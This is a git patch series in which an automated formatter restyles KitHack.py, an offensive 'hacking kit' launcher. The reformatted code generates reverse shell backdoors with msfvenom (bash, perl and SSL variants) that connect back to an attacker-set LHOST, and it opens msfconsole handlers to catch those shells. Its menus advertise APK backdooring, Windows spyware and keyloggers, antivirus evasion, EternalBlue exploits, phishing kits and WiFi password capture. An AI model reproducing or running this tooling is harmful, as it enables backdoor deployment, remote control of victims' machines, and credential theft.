"\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash LHOST={0} LPORT={1} -f raw > output/{2}.sh".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.sh'.format(mainout)).st_size != 0: + if os.stat("output/{}.sh".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '02': + elif pay == "02": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_bash_telnet_ssl LHOST={0} LPORT={1} -f raw > output/{2}.sh".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.sh'.format(mainout)).st_size != 0: + if os.stat("output/{}.sh".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.sh".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"') + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_bash_telnet_ssl; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif sys == '08': - print('{0}\n [*] {1}Select Payload:\n'.format(DEFAULT, GREEN)) - print('{0}[01]{1} cmd/unix/reverse_perl'.format(WHITE, YELLOW)) - print('{0}[02]{1} cmd/unix/reverse_perl_ssl'.format(WHITE, YELLOW)) + elif sys == "08": + print("{0}\n [*] {1}Select Payload:\n".format(DEFAULT, GREEN)) + print("{0}[01]{1} cmd/unix/reverse_perl".format(WHITE, YELLOW)) + print("{0}[02]{1} cmd/unix/reverse_perl_ssl".format(WHITE, YELLOW)) pay = input("{0}KitHack >> {1}".format(RED, DEFAULT)) pay = pay.zfill(2) - if pay == '01': + if pay == "01": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl LHOST={0} LPORT={1} -f raw > output/{2}.pl".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.pl'.format(mainout)).st_size != 0: + if os.stat("output/{}.pl".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() - elif pay == '02': + elif pay == "02": run_network() LHOST = input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - OUT = input( - "\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) + OUT = input("\n{0}Output File Name: {1}".format(YELLOW, DEFAULT)) mainout = os.path.splitext(OUT)[0] - print( - "\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) + print("\n{0}[*] Generating backdoor...{1}".format(GREEN, DEFAULT)) time.sleep(4) os.system( - 'systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl'.format(LHOST, LPORT, mainout)) + "systemctl start postgresql && msfvenom -p cmd/unix/reverse_perl_ssl LHOST={0} LPORT={1} -f raw > output/{2}.pl".format( + LHOST, LPORT, mainout + ) + ) location = os.getcwd() - if os.stat('output/{}.pl'.format(mainout)).st_size != 0: + if os.stat("output/{}.pl".format(mainout)).st_size != 0: print( - "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format(GREEN, DEFAULT, location, mainout)) - if input("\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('systemctl stop postgresql && clear') + "\n{0}[✔] Done.\n{1}Backdoor: {2}/output/{3}.pl".format( + GREEN, DEFAULT, location, mainout + ) + ) + if ( + input( + "\n{0}[!] Do you wish to run msfconsole? (y/n)\n{1}KitHack >> {2}".format( + GREEN, RED, DEFAULT + ) + ).upper() + != "Y" + ): + os.system("systemctl stop postgresql && clear") main() else: if not ".tcp.ngrok.io" in LHOST: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"'.format(LHOST, LPORT)) + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {0}; set LPORT {1}; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"'.format( + LHOST, LPORT + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: os.system( - 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"') + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST 127.0.0.1; set LPORT 443; set PAYLOAD cmd/unix/reverse_perl_ssl; exploit\'"' + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print( - "{0}[X] An error has occured whilst generating the backdoor\n".format(RED)) + "{0}[X] An error has occured whilst generating the backdoor\n".format( + RED + ) + ) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('systemctl stop postgresql && clear') + os.system("systemctl stop postgresql && clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() elif sys == 9: LHOST = raw_input("\n{0}SET LHOST: {1}".format(YELLOW, DEFAULT)) LPORT = raw_input("\n{0}SET LPORT: {1}".format(YELLOW, DEFAULT)) - PAYLOAD = raw_input( - "\n{0}SET PAYLOAD: {1}".format(YELLOW, DEFAULT)) + PAYLOAD = raw_input("\n{0}SET PAYLOAD: {1}".format(YELLOW, DEFAULT)) if ".tcp.ngrok.io" in LHOST: LHOST = "127.0.0.1" LPORT = "443" # continue - os.system('xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"'.format(LHOST, LPORT, PAYLOAD)) + os.system( + 'xterm -T "KITHACK MSFCONSOLE" -fa monaco -fs 10 -bg black -e "msfconsole -x \'use exploit/multi/handler; set LHOST {}; set LPORT {}; set PAYLOAD {}; exploit\'"'.format( + LHOST, LPORT, PAYLOAD + ) + ) pause("\n{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) pause("{}Press any key to continue...".format(GREEN)) - os.system('clear') + os.system("clear") main() - elif option == '11': - webbrowser.open("https://adrmxr.github.io/KitHack", - new=1, autoraise=True) - os.system('clear') + elif option == "11": + webbrowser.open("https://adrmxr.github.io/KitHack", new=1, autoraise=True) + os.system("clear") main() - elif option == '12': + elif option == "12": pause("\n{}Press any key to exit...".format(GREEN)) time.sleep(1) - os.system('clear') + os.system("clear") print(exit_main) exit(0) else: print("\n{}[X] INVALID OPTION\n".format(RED)) time.sleep(3) - os.system('clear') + os.system("clear") main() @@ -5337,18 +7712,21 @@ def main(): main() except KeyboardInterrupt: - choice = input('\n\n{0}[1] {1}Return to KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}'.format( - GREEN, DEFAULT, RED)) + choice = input( + "\n\n{0}[1] {1}Return to KitHack {0}[2] {1}Exit \n{2}KitHack >> {1}".format( + GREEN, DEFAULT, RED + ) + ) choice = choice.zfill(2) - if choice == '01': - if os.path.isfile('/usr/local/bin/kithack'): - os.system('clear && kithack') + if choice == "01": + if os.path.isfile("/usr/local/bin/kithack"): + os.system("clear && kithack") else: - os.system('clear && sudo python3 KitHack.py') + os.system("clear && sudo python3 KitHack.py") - elif choice == '02': + elif choice == "02": time.sleep(2) - os.system('clear') + os.system("clear") print(exit_main) exit(0) else: From 32033a4970c7f5eb5ce9653070f3315be85a79ef Mon Sep 17 00:00:00 2001 From: "Restyled.io" Date: Sat, 26 Feb 2022 22:14:18 +0000 Subject: [PATCH 4/6] Restyled by isort --- KitHack.py | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/KitHack.py b/KitHack.py index ac4eb7f..0c620f4 100755 --- a/KitHack.py +++ b/KitHack.py @@ -5,18 +5,20 @@ # Facebook: https://facebook.com/adrian.guillermo.22 # Github: https://github.com/AdrMXR -from getch import pause +import os +import subprocess +import sys +import time +import webbrowser from sys import exit +from tkinter import Tk, filedialog + import requests -import os -from lib.network import run_network +from getch import pause + from lib import kitools from lib.banners import * -from tkinter import Tk, filedialog -import webbrowser -import time -import subprocess -import sys +from lib.network import run_network BLUE, RED, WHITE, CYAN, DEFAULT, YELLOW, MAGENTA, GREEN, END, BOLD = ( "\33[94m", From 4558abc97d5d80826970e5424d6cc74922e30c12 Mon Sep 17 00:00:00 2001 From: "Restyled.io" Date: Sat, 26 Feb 2022 22:14:23 +0000 Subject: [PATCH 5/6] Restyled by reorder-python-imports --- KitHack.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/KitHack.py b/KitHack.py index 0c620f4..524e7c0 100755 --- a/KitHack.py +++ b/KitHack.py @@ -4,14 +4,14 @@ # Written by: Adrian Guillermo # Facebook: https://facebook.com/adrian.guillermo.22 # Github: https://github.com/AdrMXR - import os import subprocess import sys import time import webbrowser from sys import exit -from tkinter import Tk, filedialog +from tkinter import filedialog +from tkinter import Tk import requests from getch import pause From f764edfdc1bade40588829fdca2a29fdf7bf40ee Mon Sep 17 00:00:00 2001 From: "Restyled.io" Date: Sat, 26 Feb 2022 22:14:32 +0000 Subject: [PATCH 6/6] Restyled by yapf --- KitHack.py | 6744 +++++++++++++++++++++------------------------------- 1 file changed, 2718 insertions(+), 4026 deletions(-) diff --git a/KitHack.py b/KitHack.py index 524e7c0..fb7b0df 100755 --- a/KitHack.py +++ b/KitHack.py @@ -44,7 +44,8 @@ def check_connection(host="https://www.google.com"): time.sleep(0.5) pass except: - print("{0}[x]:{1} Check your internet connection.".format(RED, DEFAULT)) + print("{0}[x]:{1} Check your internet connection.".format( + RED, DEFAULT)) exit(0) @@ -54,10 +55,8 @@ def check_permissions(): else: os.system("clear") print( - "{0}[!]{1} ¡Permission denied! Remember to run: {2}sudo {1}python3 KitHack.py".format( - RED, DEFAULT, GREEN - ) - ) + "{0}[!]{1} ¡Permission denied! Remember to run: {2}sudo {1}python3 KitHack.py" + .format(RED, DEFAULT, GREEN)) exit(0) @@ -76,60 +75,38 @@ def main(): if option == "01": os.system("clear") print( - "========={0}Tool{1}==================================={0}Information{1}================================".format( - GREEN, DEFAULT - ) - ) + "========={0}Tool{1}==================================={0}Information{1}================================" + .format(GREEN, DEFAULT)) print( - "{0}01){1} Backdoor-apk {2}Add a backdoor to any APK file.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}01){1} Backdoor-apk {2}Add a backdoor to any APK file.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}02){1} Evil-Droid {2}Android Backdoor Generator Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}02){1} Evil-Droid {2}Android Backdoor Generator Tool." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}03){1} Spade {2}APK Backdoor Tool Made in Python.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}03){1} Spade {2}APK Backdoor Tool Made in Python." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}04){1} AhMyth {2}Android Remote Administration Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}04){1} AhMyth {2}Android Remote Administration Tool." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}05){1} Andspoilt {2}Run interactive Android exploits on Linux.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}05){1} Andspoilt {2}Run interactive Android exploits on Linux." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}06){1} Kwetza {2}Inject malware into existing Android apps.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}06){1} Kwetza {2}Inject malware into existing Android apps." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}07){1} Termux {2}Linux based Android terminal emulator.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}07){1} Termux {2}Linux based Android terminal emulator." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}08){1} Android-Exploits {2}Collection of Android exploits and hacks.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}08){1} Android-Exploits {2}Collection of Android exploits and hacks." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}09){1} Grabcam {2}Allows to hack the camera of our victims with a fake page.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}09){1} Grabcam {2}Allows to hack the camera of our victims with a fake page." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}10){1} Androidpatternlock {2}Allows to get the pattern lock on Android devices.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}10){1} Androidpatternlock {2}Allows to get the pattern lock on Android devices." + .format(WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -178,75 +155,46 @@ def main(): elif option == "02": os.system("clear") print( - "========{0}Tool{1}================================================{0}Information{1}===================================".format( - GREEN, DEFAULT - ) - ) + "========{0}Tool{1}================================================{0}Information{1}===================================" + .format(GREEN, DEFAULT)) print( - "{0}01){1} Winpayloads {2}Undetectable payload generator in Windows.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}01){1} Winpayloads {2}Undetectable payload generator in Windows." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}02){1} sAINT {2}Spyware generator for Windows systems.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}02){1} sAINT {2}Spyware generator for Windows systems." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}03){1} BeeLogger {2}Gmail Keylogger Generator for Windows.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}03){1} BeeLogger {2}Gmail Keylogger Generator for Windows." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}04){1} FakeImageExploiter {2}Inject malware into jpg images for Windows.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}04){1} FakeImageExploiter {2}Inject malware into jpg images for Windows." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}05){1} Koadic {2}Post-Exploit Windows Rootkit.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}05){1} Koadic {2}Post-Exploit Windows Rootkit." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}06){1} Phantom Evasion {2}Antivirus Evasion Tool.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}06){1} Phantom Evasion {2}Antivirus Evasion Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}07){1} Ps1encode {2}PowerShell-based payload generator and encoder." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}07){1} Ps1encode {2}PowerShell-based payload generator and encoder.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}08){1} DKMC {2}Malicious Payload Evasion Tool." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}08){1} DKMC {2}Malicious Payload Evasion Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}09){1} Cromos {2}Inject code into legitimate Chrome Web extensions." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}09){1} Cromos {2}Inject code into legitimate Chrome Web extensions.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}10){1} Eternal_scanner {2}Scanner for Eternal Blue and Eternal Romance exploit." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}10){1} Eternal_scanner {2}Scanner for Eternal Blue and Eternal Romance exploit.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}11){1} EternalblueDoublepulsar {2}Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}11){1} EternalblueDoublepulsar {2}Metasploit module to exploit the Eternalblue-Doublepulsar vulnerability.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}12){1} EternalBlueWinXPWin10 {2}Metasploit Module for EternalBlue from Windows XP SP2 to Windows 10 Pro." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}12){1} EternalBlueWinXPWin10 {2}Metasploit Module for EternalBlue from Windows XP SP2 to Windows 10 Pro.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}13){1} Windows-Exploits {2}Windows Exploits Collection.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}13){1} Windows-Exploits {2}Windows Exploits Collection." + .format(WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -304,65 +252,37 @@ def main(): elif option == "03": os.system("clear") print( - "======={0}Tool{1}======================================={0}Information{1}=====================================".format( - GREEN, DEFAULT - ) - ) - print( - "{0}01){1} HiddenEye {2}Modern phishing tool with advanced functionality.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}02){1} PhishX {2}Phishing and Spoofing Generator.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}03){1} SocialPhish {2}Phishing tool with 32 templates + 1 customizable.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "======={0}Tool{1}======================================={0}Information{1}=====================================" + .format(GREEN, DEFAULT)) print( - "{0}04){1} SocialFish {2}Phishing educational tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}01){1} HiddenEye {2}Modern phishing tool with advanced functionality." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}02){1} PhishX {2}Phishing and Spoofing Generator.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}05){1} PhisherMan {2}Phishing tool with 17 templates and working with ngrok.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}03){1} SocialPhish {2}Phishing tool with 32 templates + 1 customizable." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}04){1} SocialFish {2}Phishing educational tool.".format( + WHITE, YELLOW, DEFAULT)) print( - "{0}06){1} Spectre {2}Supports phishing attacks with almost any website.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}05){1} PhisherMan {2}Phishing tool with 17 templates and working with ngrok." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}07){1} Blackeye {2}Phishing tool with 38 websites available.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}06){1} Spectre {2}Supports phishing attacks with almost any website." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}08){1} PhEmail {2}Automate phishing email delivery processes.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}07){1} Blackeye {2}Phishing tool with 38 websites available." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}09){1} Weeman {2}HTTP Server for Phishing.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}08){1} PhEmail {2}Automate phishing email delivery processes." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}09){1} Weeman {2}HTTP Server for Phishing.".format( + WHITE, YELLOW, DEFAULT)) + print("{0}10){1} Zphisher {2}Automated phishing tool.".format( + WHITE, YELLOW, DEFAULT)) print( - "{0}10){1} Zphisher {2}Automated phishing tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}11){1} AIOPhish {2}Phishing tool with different options.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}11){1} AIOPhish {2}Phishing tool with different options.". + format(WHITE, YELLOW, DEFAULT)) print("{0} 0){1} Back".format(WHITE, YELLOW)) tool = input("{0}KitHack >> {1}".format(RED, DEFAULT)) @@ -414,110 +334,62 @@ def main(): elif option == "04": os.system("clear") print( - "======={0}Tool{1}====================================={0}Information{1}======================================".format( - GREEN, DEFAULT - ) - ) - print( - "{0}01){1} Fluxion {2}Network Auditing/Social Engineering Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}02){1} Wifiphisher {2}WiFi Password Capture Tool Using AP.".format( - WHITE, YELLOW, DEFAULT - ) - ) - print( - "{0}03){1} Wifibroot {2}WPA/WPA2 WiFi Penetration Testing Tool. ".format( - WHITE, YELLOW, DEFAULT - ) - ) + "======={0}Tool{1}====================================={0}Information{1}======================================" + .format(GREEN, DEFAULT)) print( - "{0}04){1} Wifite {2}Run existing wireless auditing tools for you.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}01){1} Fluxion {2}Network Auditing/Social Engineering Tool." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}05){1} Ettercap {2}Interceptor/sniffer/logger for switched LANs .".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}02){1} Wifiphisher {2}WiFi Password Capture Tool Using AP.". + format(WHITE, YELLOW, DEFAULT)) print( - "{0}06){1} Linset {2}WPA/WPA2 Phishing Tool.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}03){1} Wifibroot {2}WPA/WPA2 WiFi Penetration Testing Tool. " + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}07){1} WiFi-Pumpkin {2}AP framework to easily create fake networks.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}04){1} Wifite {2}Run existing wireless auditing tools for you." + .format(WHITE, YELLOW, DEFAULT)) print( - "{0}08){1} Wifresti {2}Find your wireless network password on Windows, Linux and Mac OS.".format( - WHITE, YELLOW, DEFAULT - ) - ) + "{0}05){1} Ettercap {2}Interceptor/sniffer/logger for switched LANs ." + .format(WHITE, YELLOW, DEFAULT)) + print("{0}06){1} Linset {2}WPA/WPA2 